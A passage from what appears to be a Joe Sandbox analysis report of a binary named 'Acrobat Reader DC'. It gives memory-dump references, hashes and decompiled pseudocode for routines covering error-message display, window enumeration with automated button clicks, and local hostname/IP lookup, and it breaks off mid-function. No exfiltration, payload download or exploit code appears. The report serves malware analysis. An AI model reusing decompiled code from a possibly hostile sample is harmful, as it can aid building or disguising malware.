                                  0x0045322c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00453234
                                  0x00453237
                                  0x00453237
                                  0x00453243
                                  0x00000000
                                  0x00000000
                                  0x00453250
                                  0x00453253
                                  0x0045326e
                                  0x0045327a
                                  0x00453255
                                  0x00453255
                                  0x00453255
                                  0x00453261
                                  0x00453266
                                  0x00000000
                                  0x00000000
                                  0x00453287
                                  0x00453289
                                  0x00453289
                                  0x00453293
                                  0x00453296
                                  0x00453296
                                  0x0045329d
                                  0x004532a5
                                  0x004532a5
                                  0x004532a8
                                  0x00453347
                                  0x00453349
                                  0x0045334e
                                  0x00453350
                                  0x00453358
                                  0x0045335a
                                  0x00453375
                                  0x00453378
                                  0x00000000
                                  0x0045337b
                                  0x00453364
                                  0x0045336b
                                  0x00453372
                                  0x00000000
                                  0x00000000
                                  0x004532b2
                                  0x004532b4
                                  0x004532b6
                                  0x004532b8
                                  0x004532c4
                                  0x004532c4
                                  0x004532c9
                                  0x004532cb
                                  0x004532cd
                                  0x004532d3
                                  0x004532d5
                                  0x004532d7
                                  0x004532da
                                  0x004532dd
                                  0x004532f1
                                  0x004532f1
                                  0x004532f3
                                  0x004532df
                                  0x004532df
                                  0x004532e1
                                  0x004532e7
                                  0x004532ec
                                  0x004532f6
                                  0x004532f8
                                  0x004532fd
                                  0x004532ff
                                  0x00453304
                                  0x00453307
                                  0x00453309
                                  0x00453327
                                  0x00453327
                                  0x00453329
                                  0x0045332a
                                  0x0045332d
                                  0x00453332
                                  0x00453335
                                  0x00453336
                                  0x0045333b
                                  0x0045330b
                                  0x0045330b
                                  0x0045330d
                                  0x00453312
                                  0x00453313
                                  0x00453316
                                  0x0045331b
                                  0x0045331e
                                  0x0045331f
                                  0x00453324
                                  0x00453324
                                  0x00000000
                                  0x00000000
                                  0x004531d6
                                  0x004531d0
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0045E538(void* __fp0, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v64;
				WCHAR* _v80;
				short _v8276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t48;
				WCHAR* _t57;
				intOrPtr _t92;
				WCHAR* _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr _t122;
				struct HINSTANCE__* _t123;
				void* _t136;

				_t136 = __fp0;
				_t48 = E00422240(0x2054);
				if( *0x4974e2 == 0) {
					_t48 = _a4;
					_t129 =  *((intOrPtr*)(_t48 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t48 + 0xf8)) != 1) {
						LoadStringW( *0x497520, 0x66,  &_v8276, 0xfff);
						_t110 =  &_v8276;
						E00401B10(_t110,  &_v80, _t129);
						_t95 =  *0x497520;
						LoadStringW( *0x497520, 0x72, _t110, 0xfff);
						E00401B10(_t110,  &_v64, _t129);
						_t105 = _a4;
						_t120 =  *((intOrPtr*)(_a4 + 0xf4));
						_v8 = E004348DE(_t120);
						_t111 = E004348AA(_t120);
						_v28 = _t111;
						_t92 = E00434908(E0043492F(_t120));
						_v32 = _t92;
						_t57 =  &_v8276;
						_t130 = _t92;
						if(_t92 == 0) {
							_t95 = _a4;
							_t105 =  *((intOrPtr*)(_t95 + 0xc8));
							_push( *((intOrPtr*)(_t95 + 0xc8)));
							_push(_t120);
						} else {
							_push(_t92);
							_push(_t111);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t57);
						E0041329B(_t105);
						E00401B10( &_v8276,  &_v24, _t130);
						_t122 = _v8;
						_t131 = _t122;
						if(_t122 != 0) {
							E0040D200( &_v24, _t95, _t122, _t136);
							E0040D200( &_v24, _t95, "\n", _t136);
						}
						_t96 =  &_v48;
						E0040BC70( &_v48, _t131);
						_t113 = _a8;
						if(_a8 != 0) {
							E00402160( &_v48, L"^ ERROR ", _t105, _t113);
							E0040D200( &_v48,  &_v48, _t113, _t136);
							_t96 =  &_v48;
							E0040BD50( &_v24, _t136,  &_v48);
							E0040D200( &_v24,  &_v48, "\n", _t136);
							_t92 = _v32;
						}
						E0040D200( &_v24, _t96, L"\nError: ", _t136);
						E0040BD50( &_v24, _t136,  &_v64);
						if( *0x4974e8 == 0) {
							MessageBoxW( *0x497518, _v24, _v80, 0x11010);
							goto L14;
						} else {
							_t134 = _t92;
							if(_t92 == 0) {
								_t123 = _a4;
								_push(_v64);
								_push( *((intOrPtr*)(_t123 + 0xf4)));
								_push( *((intOrPtr*)(_t123 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00413ABE(_t92,  *((intOrPtr*)(_t123 + 0xc8)), L"\nError: ", _t123, __eflags);
								L15:
								asm("sbb eax, eax");
								 *((intOrPtr*)(_t123 + 0xf8)) = 1;
								 *0x4974f4 = ( ~( *(_t123 + 0x118) & 0x000000ff) & 0x7ffff071) + 1;
								E00402250( &_v48);
								E00402250( &_v24);
								E00402250( &_v64);
								return E00402250( &_v80);
							}
							_push(_v48);
							_push(_t122);
							_push(_v64);
							_push(_v28);
							_push(_t92);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00413ABE(_t92, _v28, L"\nError: ", _t122, _t134);
							L14:
							_t123 = _a4;
							goto L15;
						}
					}
				}
				return _t48;
			}
























                                  0x0045e538
                                  0x0045e540
                                  0x0045e54f
                                  0x0045e555
                                  0x0045e558
                                  0x0045e55f
                                  0x0045e580
                                  0x0045e582
                                  0x0045e58b
                                  0x0045e590
                                  0x0045e59f
                                  0x0045e5a4
                                  0x0045e5a9
                                  0x0045e5ac
                                  0x0045e5b9
                                  0x0045e5c1
                                  0x0045e5c4
                                  0x0045e5d2
                                  0x0045e5d4
                                  0x0045e5d7
                                  0x0045e5dd
                                  0x0045e5df
                                  0x0045e5e5
                                  0x0045e5e8
                                  0x0045e5ee
                                  0x0045e5ef
                                  0x0045e5e1
                                  0x0045e5e1
                                  0x0045e5e2
                                  0x0045e5e2
                                  0x0045e5f0
                                  0x0045e5f5
                                  0x0045e5f6
                                  0x0045e607
                                  0x0045e60c
                                  0x0045e60f
                                  0x0045e611
                                  0x0045e618
                                  0x0045e625
                                  0x0045e625
                                  0x0045e62a
                                  0x0045e62d
                                  0x0045e632
                                  0x0045e637
                                  0x0045e641
                                  0x0045e649
                                  0x0045e64e
                                  0x0045e655
                                  0x0045e662
                                  0x0045e667
                                  0x0045e667
                                  0x0045e672
                                  0x0045e67e
                                  0x0045e68a
                                  0x0045e6e5
                                  0x00000000
                                  0x0045e68c
                                  0x0045e68c
                                  0x0045e68e
                                  0x0045e6b0
                                  0x0045e6bf
                                  0x0045e6c0
                                  0x0045e6c1
                                  0x0045e6c2
                                  0x0045e6c7
                                  0x0045e6ee
                                  0x0045e6f7
                                  0x0045e702
                                  0x0045e70c
                                  0x0045e711
                                  0x0045e719
                                  0x0045e721
                                  0x00000000
                                  0x0045e729
                                  0x0045e699
                                  0x0045e69a
                                  0x0045e69b
                                  0x0045e69c
                                  0x0045e69d
                                  0x0045e69e
                                  0x0045e6a3
                                  0x0045e6eb
                                  0x0045e6eb
                                  0x00000000
                                  0x0045e6eb
                                  0x0045e68a
                                  0x0045e55f
                                  0x0045e734

                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                  • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443B61(void* __edx, long* _a4) {
				void* __esi;
				void* _t5;
				struct HWND__* _t8;
				struct HWND__* _t9;
				struct HWND__* _t12;
				struct HWND__* _t18;
				long* _t22;
				struct HWND__* _t24;
				void* _t25;
				struct HWND__* _t26;
				struct HWND__* _t27;
				long _t28;
				long _t29;
				struct HWND__* _t30;
				void* _t35;

				_t25 = __edx;
				_t29 = timeGetTime();
				if( *0x4974ef == 0) {
					L12:
					return 0;
				} else {
					_t22 = _a4;
					while(1) {
						_t5 = E0040C620(_t29);
						_t28 = _t22[1];
						_t35 = _t25;
						if(_t35 > 0 || _t35 >= 0 && _t5 >= _t28) {
							break;
						}
						Sleep(0xa);
						if( *0x4974ef != 0) {
							continue;
						} else {
							return 0;
						}
						goto L13;
					}
					 *0x4a7538 = 0;
					EnumThreadWindows( *_t22, E00433D09, 0);
					_t8 =  *0x4a7538; // 0x0
					if(_t8 != 0) {
						 *0x4974ee = 1;
						_t9 = FindWindowExW(_t8, 0, L"BUTTON", 0);
						_t24 =  *0x4a7538; // 0x0
						_t30 = _t9;
						if(_t30 == 0) {
							SendMessageW(_t24, 0x10, 0, 0);
							Sleep(0xfa);
							_t26 =  *0x4a7538; // 0x0
							if(IsWindow(_t26) == 0) {
								goto L12;
							} else {
								_t12 =  *0x4a7538; // 0x0
								EndDialog(_t12, 0);
								return 0;
							}
						} else {
							E004439C1(_t24, 1);
							_t27 =  *0x4a7538; // 0x0
							SetActiveWindow(_t27);
							SendMessageW(_t30, 0xf5, 0, 0);
							_t18 =  *0x4a7538; // 0x0
							E004439C1(_t18, 0);
							return 0;
						}
					} else {
						goto L12;
					}
				}
				L13:
			}


















                                  0x00443b61
                                  0x00443b74
                                  0x00443b76
                                  0x00443c80
                                  0x00443c84
                                  0x00443b7c
                                  0x00443b7c
                                  0x00443b81
                                  0x00443b81
                                  0x00443b86
                                  0x00443b8b
                                  0x00443b8d
                                  0x00000000
                                  0x00000000
                                  0x00443b9f
                                  0x00443bac
                                  0x00000000
                                  0x00443bb0
                                  0x00443bb4
                                  0x00443bb4
                                  0x00000000
                                  0x00443bac
                                  0x00443c65
                                  0x00443c6b
                                  0x00443c71
                                  0x00443c78
                                  0x00443bc1
                                  0x00443bc8
                                  0x00443bce
                                  0x00443bd4
                                  0x00443bd8
                                  0x00443c22
                                  0x00443c2d
                                  0x00443c33
                                  0x00443c42
                                  0x00000000
                                  0x00443c44
                                  0x00443c44
                                  0x00443c4c
                                  0x00443c58
                                  0x00443c58
                                  0x00443bda
                                  0x00443bdd
                                  0x00443be2
                                  0x00443bec
                                  0x00443bfc
                                  0x00443c02
                                  0x00443c0a
                                  0x00443c18
                                  0x00443c18
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443c78
                                  0x00000000

                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                  • String ID: BUTTON
                                  • API String ID: 1834419854-3405671355
                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00454014(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _v24;
				WCHAR* _v40;
				short _v8232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t49;
				void* _t56;
				void* _t73;
				void* _t75;

				_t75 = __fp0;
				_t73 = __eflags;
				E00422240(0x2028);
				_t49 = _a4;
				_t50 =  *(_t49 + 0x48);
				LoadStringW(GetModuleHandleW(0),  *(_t49 + 0x48),  &_v8232, 0xfff);
				_t67 =  &_v40;
				E00401B10( &_v8232,  &_v40, _t73);
				_t74 =  *((char*)(_t49 + 3));
				if( *((char*)(_t49 + 3)) == 0) {
					_t29 = _a8;
					__eflags = _t29;
					if(_t29 != 0) {
						_push(_t29);
						E0041329B(_a12,  &_v8232, L"Line %d  (File \"%s\"):\n\n", _a12);
					} else {
						_t50 =  &_v8232;
						E0041329B(_t56,  &_v8232, L"Line %d:\n\n", _a12);
					}
					_t68 =  &_v24;
					E00401B10( &_v8232,  &_v24, __eflags);
					E0040D200( &_v24, _t50, _a20, _t75);
					E0040D200(_t68, _t50, L"\n\nError: ", _t75);
					E0040D200(_t68, _t50, _a16, _t75);
					E0040D200(_t68, _t50, L".\n\n", _t75);
					MessageBoxW(0, _v24, _v40, 0x11010);
					E00402250(_t68);
					return E00402250( &_v40);
				} else {
					_push(0x484ea8);
					_push(_a20);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					_push(L"%s (%d) : ==> %s.: \n%s \n%s\n");
					E00413ABE(_t49, _a8,  &_v8232,  &_v40, _t74);
					return E00402250(_t67);
				}
			}















                                  0x00454014
                                  0x00454014
                                  0x0045401c
                                  0x00454022
                                  0x00454025
                                  0x00454040
                                  0x0045404c
                                  0x0045404f
                                  0x00454054
                                  0x00454058
                                  0x0045408c
                                  0x0045408f
                                  0x00454091
                                  0x004540b0
                                  0x004540be
                                  0x00454093
                                  0x00454097
                                  0x004540a3
                                  0x004540a8
                                  0x004540cc
                                  0x004540cf
                                  0x004540d9
                                  0x004540e5
                                  0x004540ef
                                  0x004540fb
                                  0x0045410f
                                  0x00454117
                                  0x0045412a
                                  0x0045405a
                                  0x00454063
                                  0x00454068
                                  0x0045406c
                                  0x0045406d
                                  0x0045406e
                                  0x0045406f
                                  0x00454074
                                  0x00454089
                                  0x00454089

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433493 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 84networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E00433493(signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v268;
				char _v668;
				char* _t14;
				int _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t24;
				void* _t25;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr _t33;
				signed int _t34;
				void* _t35;

				_t34 = _a4;
				_t33 = _a8;
				_t14 =  &_v668;
				__imp__#115(0x101, _t14);
				if(_t14 != 0) {
					L8:
					return E00411567(_t33, 0x484ea8);
				} else {
					_t16 = gethostname( &_v268, 0x100);
					__imp__#52( &_v268);
					if(_t16 == 0) {
						goto L8;
					} else {
						_t17 =  *((intOrPtr*)(_t16 + 0xc));
						_t31 = 0;
						if( *_t17 != 0) {
							_t29 = _t17;
							do {
								_t29 = _t29 + 4;
								_t31 = _t31 + 1;
							} while ( *_t29 != 0);
						}
						if(_t34 <= _t31) {
							_t19 = E00410E60( &_v8,  *((intOrPtr*)(_t17 + _t34 * 4 - 4)), 4);
							__imp__#11(_v8);
							E00413650( &_v268, _t19);
							_t35 = E0043299A( &_v268, 0xffffffff);
							E00411567(_t33, _t35);
							_t24 = E004111DC();
							__imp__#116(_t35);
							return _t24;
						} else {
							_t25 = E00411567(_t33, L"0.0.0.0");
							__imp__#116();
							return _t25;
						}
					}
				}
			}

















                                  0x0043349d
                                  0x004334a1
                                  0x004334a4
                                  0x004334b0
                                  0x004334b8
                                  0x00433570
                                  0x00433583
                                  0x004334be
                                  0x004334ca
                                  0x004334d7
                                  0x004334df
                                  0x00000000
                                  0x004334e5
                                  0x004334e5
                                  0x004334e8
                                  0x004334ec
                                  0x004334ee
                                  0x004334f3
                                  0x004334f3
                                  0x004334f6
                                  0x004334f7
                                  0x004334f3
                                  0x004334fe
                                  0x00433525
                                  0x00433531
                                  0x0043353f
                                  0x00433552
                                  0x00433556
                                  0x0043355c
                                  0x00433564
                                  0x0043356f
                                  0x00433500
                                  0x00433506
                                  0x0043350e
                                  0x00433519
                                  0x00433519
                                  0x004334fe
                                  0x004334df

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 3306283345-3771769585
                                  • Opcode ID: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E00467C8E(intOrPtr* _a4, signed short* _a8) {
				char _v8;
				signed short* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v36;
				signed short _v44;
				void* __edi;
				void* __esi;
				signed int _t100;
				intOrPtr _t105;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				void* _t120;
				signed int _t135;
				signed int _t139;
				signed int _t146;
				signed short* _t154;
				void* _t155;
				signed int _t157;
				signed short _t161;
				signed int _t183;
				void* _t199;
				signed short* _t202;
				signed int _t204;
				signed int _t208;
				signed int _t210;
				intOrPtr* _t212;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t227;

				_t154 = _a8;
				_t100 =  *_t154 & 0x0000ffff;
				_t219 = _t218 - 0x2c;
				_t212 = _a4;
				if((_t100 & 0x00002000) == 0) {
					L13:
					return 0;
				} else {
					if((_t100 & 0x00004000) == 0) {
						_t154 = _t154[4];
						_v12 = _t154;
						_t202 = _t154;
					} else {
						_t202 =  *(_t154[4]);
						_v12 = _t202;
					}
					if(_t202 == 0) {
						goto L13;
					} else {
						E0040E950(_t212, _t154);
						 *((intOrPtr*)( *_t212 + 0x210)) =  *_t202;
						_t105 =  *_t212;
						_t155 = 0;
						if( *((intOrPtr*)(_t105 + 0x210)) > 0) {
							_t13 =  &(_t202[8]); // 0x479a60
							_t199 = 0x10c;
							_a8 = _t13;
							do {
								_a8 =  &(_a8[4]);
								 *(_t199 + _t105) =  *_a8;
								_t105 =  *_t212;
								_t155 = _t155 + 1;
								_t199 = _t199 + 4;
							} while (_t155 <  *((intOrPtr*)(_t105 + 0x210)));
						}
						E0040E830(_t212, _t155, 0);
						_t146 =  *( *_t212 + 8);
						_t157 = _t202[1] & 0x0000ffff;
						_t109 = _t157 & 0x00000f00;
						_t220 = _t219 + 4;
						_t227 = _t109 - 0x400;
						if(_t227 > 0) {
							__eflags = _t109 - 0x800;
							if(_t109 == 0x800) {
								_t110 =  &_v24;
								__imp__#23(_t202, _t110);
								__eflags = _t110;
								if(_t110 >= 0) {
									_t204 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										_a4 = 0;
										do {
											_push(0x10);
											_t113 = E004115D7(_t204, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = 0;
												__eflags = 0;
											} else {
												 *_t113 = 0;
												 *((intOrPtr*)(_t113 + 8)) = 1;
												 *((intOrPtr*)(_t113 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t204 * 4) = _t113;
											_v44 = 0x400c;
											_v36 = _a4 + _v24;
											E00468070( *( *((intOrPtr*)( *_t212)) + _t204 * 4),  &_v44);
											_a4 = _a4 + 0x10;
											_t204 = _t204 + 1;
											__eflags = _t204 - _t146;
										} while (__eflags < 0);
									}
									goto L57;
								}
								goto L58;
							} else {
								goto L30;
							}
						} else {
							if(_t227 == 0) {
								__imp__#23(_t202,  &_v20);
								__eflags = _t109;
								if(_t109 < 0) {
									goto L58;
								} else {
									_t208 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										do {
											_push(0x10);
											_t135 = E004115D7(_t208, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t135;
											if(_t135 == 0) {
												_t135 = 0;
												__eflags = 0;
											} else {
												 *_t135 = 0;
												 *((intOrPtr*)(_t135 + 8)) = 1;
												 *((intOrPtr*)(_t135 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t208 * 4) = _t135;
											_v44 = 9;
